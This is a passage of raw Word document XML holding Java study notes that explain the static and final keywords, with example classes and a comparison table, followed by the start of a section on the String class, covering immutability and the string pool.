          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, so all instances of MyClass will share the same counter value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5634C65C" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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final keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA9768" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to define constants, prevent method overriding, and prevent inheritance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487F3E68" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5489FC83" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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nal Variable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A final variable can only be assigned once and its value cannot be changed after initialization (i.e., it acts as a constant).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA91A89" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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nal Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A final method cannot be overridden by subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6BD7A8" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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nal Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A final class cannot be subclassed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3D125C" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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73F63473"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MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47472899"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nal int MAX_VALUE = 100; // Final variable (constant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED4323"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C35491E"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nal void displayMessage() { // Final method (cannot be overridden)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342CE9A"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This is a final method.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FCC774"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07CA15B"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846EF68" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045B5056"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AnotherClass extends MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E25A7C4"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Trying to override the final method will result in a compile-time error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A1F0B4"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void displayMessage() { // Error: Cannot override the final method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709C15CF"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ystem.out.println("New message.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFDA009"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F13A3B"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B53D5C9" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3D2629"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EDB7D5"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68B21E0C"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Class obj = new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437B0FE"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obj.MAX_VALUE); // Outputs: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378DB2B3"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20D603B"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631A427" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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ifferences between static and fina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0"/>
        <w:gridCol w:w="3978"/>
        <w:gridCol w:w="5106"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="625313D5" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19735B84" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="798A8747" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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atic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5274B510" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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inal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="7C92667F" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="282CB73C"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inition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="567E3F01"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to declare class-level variables or methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4443EAC5"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to make variables constant, prevent method overriding, or prevent class inheritance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="794CB579" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17731BA9"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pplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35F8F03F"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pplies to variables, methods, and blocks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A25702A"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pplies to variables, methods, and classes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="2C48518B" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EDAE855"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0FC4A4"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hared among all instances of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF7B786"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kes variables constant, methods non-overridable, and classes non-subclassable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="0BFCA113" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D6D0E5F"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ariable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BCD3A4A"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static variable is shared by all objects of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B41F263"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final variable can be assigned only once and cannot be modified after that.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="7F271C68" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75BC18F6"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C168503"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static method can be called without creating an instance of the class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16F99072"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final method cannot be overridden by subclasses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="3E915113" w14:textId="77777777" w:rsidTr="0071647A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A79CE6D"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lass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DF0DCD3"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static class is not possible, but static inner classes are allowed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C547175"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final class cannot be extended (i.e., no subclassing).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67E008E3" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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to Combine Both (static and final):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1D524"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MyClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1A9666"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atic final int MAX_LIMIT = 100; // static final variable (constant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08BC78" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C331345"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atic void displayLimit() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E772971"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Max Limit: " + MAX_LIMIT); // Static method using final constant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D92B1"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8716471"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1274294" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A320773"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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C549EE5"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4560820B"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Class.displayLimit(); // Outputs: Max Limit: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269CB72"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FAE9A06"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857A833"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this case, MAX_LIMIT is both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning it's shared across all instances and cannot be modified after being assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DCAC6E" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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0DCFD433" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Refers to class-level members (variables, methods) that are shared across all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790C7301" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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nal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to make variables constant, prevent method overriding, or prevent class inheritance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EBD03D" w14:textId="5F98C30D" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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F08CC78">
          <v:rect id="_x0000_i1229" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C726D26" w14:textId="5A48B01F" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="009308A9" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc196307564"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain about String class in java</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="196A6DC2" w14:textId="5A89F2C3" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="00740CED">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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class in Java is one of the most widely used classes, and it represents a sequence of characters. It is immutable, meaning once a String object is created, its value cannot be changed. The String class belongs to the java.lang package and provides numerous methods to work with strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2301797B" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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Points about the String class in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9E1A89" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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Immutable Nature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6CABBF" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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mmutability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that once a String object is created, its value cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A059E25" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Any operation that modifies a string, such as concatenation, actually creates a new String object, leaving the original object unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2490D0AD" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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String Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A25184" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ring Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Constant Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a special storage area in the heap memory where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String literals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E1889" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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a new String object is created using a literal, Java checks if that string already exists in the pool. If it does, the reference to the existing string is returned. Otherwise, the new string is added to the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0029C" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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helps reduce memory usage and improve performance by reusing existing String objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690CF0B" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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String Declaration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63D7EC"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string in Java can be declared in two ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F6D65" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ing String literal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which goes into the String Pool):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F4B4C6" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 str1 = "Hello";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C7FE26" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ing the new keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516DD910" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 str2 = new String("Hello");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D0BCE"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econd method creates a new String object in the heap, but it may also add it to the String Pool if the string is not already present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212AEB9A" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A"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String Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069D3FE7"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tring class provides a wide range of methods for string manipulation. Some commonly used methods include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A922EF" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ength()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the length of the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE167F" w14:textId="77777777" w:rsidR="0071647A" w:rsidRPr="00CE4B95" w:rsidRDefault="0071647A" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>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 str = "Hello";</w:t>
      </w:r>
    </w:p>
